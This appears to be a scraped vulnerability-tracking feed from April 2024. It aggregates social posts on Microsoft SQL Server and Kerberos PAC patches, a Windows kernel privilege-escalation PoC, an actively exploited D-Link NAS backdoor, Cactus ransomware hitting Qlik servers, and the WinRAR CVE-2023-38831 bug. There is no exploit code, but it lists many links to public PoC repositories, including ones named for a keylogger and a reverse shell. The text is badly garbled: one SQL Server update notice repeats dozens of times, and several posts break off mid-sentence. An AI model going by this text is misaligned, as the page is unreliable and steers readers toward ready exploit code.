Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:37
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.
Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).
For more details see:
https://support.microsoft.com/en-us/topic/kb5037754-how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1
Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.
Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).
For more details see:
https://support.microsoft.com/en-us/topic/kb5037754-how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1
updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:36
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:35
6 posts
1 repos
🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##PoC Exploit Released For Windows Kernel EoP Vulnerability https://gbhackers.com/windows-kernel-eop-exploit-released/ #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##PoC Exploit Released For Windows Kernel EoP Vulnerability https://gbhackers.com/windows-kernel-eop-exploit-released/ #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##updated 2024-04-09T18:30:35
2 posts
Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.
Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).
For more details see:
https://support.microsoft.com/en-us/topic/kb5037754-how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1
Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.
Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).
For more details see:
https://support.microsoft.com/en-us/topic/kb5037754-how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1
updated 2024-04-09T18:30:35
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:35
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:35
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:28
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:27
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-09T18:30:27
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-07T15:30:32
4 posts
8 repos
https://github.com/LeopoldSkell/CVE-2024-3273
https://github.com/adhikara13/CVE-2024-3273
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
https://github.com/ThatNotEasy/CVE-2024-3273
https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273
https://github.com/mrrobot0o/CVE-2024-3273-
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##CVE-2024-3273 Proof of Concept https://github.com/adhikara13/CVE-2024-3273
##CVE-2024-3273 Proof of Concept https://github.com/adhikara13/CVE-2024-3273
##updated 2024-04-06T05:01:36
2 posts
3 repos
https://github.com/CCIEVoice2009/CVE-2024-1086
updated 2024-04-05T06:30:47
2 posts
1 repos
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##updated 2024-04-04T07:16:03
2 posts
1 repos
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-04T07:09:58
6 posts
43 repos
https://github.com/SugiB3o/Keylog_CVE2023-38831
https://github.com/r1yaz/winDED
https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc
https://github.com/asepsaepdin/CVE-2023-38831
https://github.com/Malwareman007/CVE-2023-38831
https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT
https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831
https://github.com/MyStuffYT/CVE-2023-38831-POC
https://github.com/xaitax/WinRAR-CVE-2023-38831
https://github.com/malvika-thakur/CVE-2023-38831
https://github.com/elefantesagradodeluzinfinita/cve-2023-38831
https://github.com/nhman-python/CVE-2023-38831
https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit
https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
https://github.com/z3r0sw0rd/CVE-2023-38831-PoC
https://github.com/Mich-ele/CVE-2023-38831-winrar
https://github.com/PascalAsch/CVE-2023-38831-KQL
https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831
https://github.com/GOTonyGO/CVE-2023-38831-winrar
https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar
https://github.com/thegr1ffyn/CVE-2023-38831
https://github.com/an040702/CVE-2023-38831
https://github.com/Garck3h/cve-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://github.com/80r1ng/CVE-2023-38831-EXP
https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC
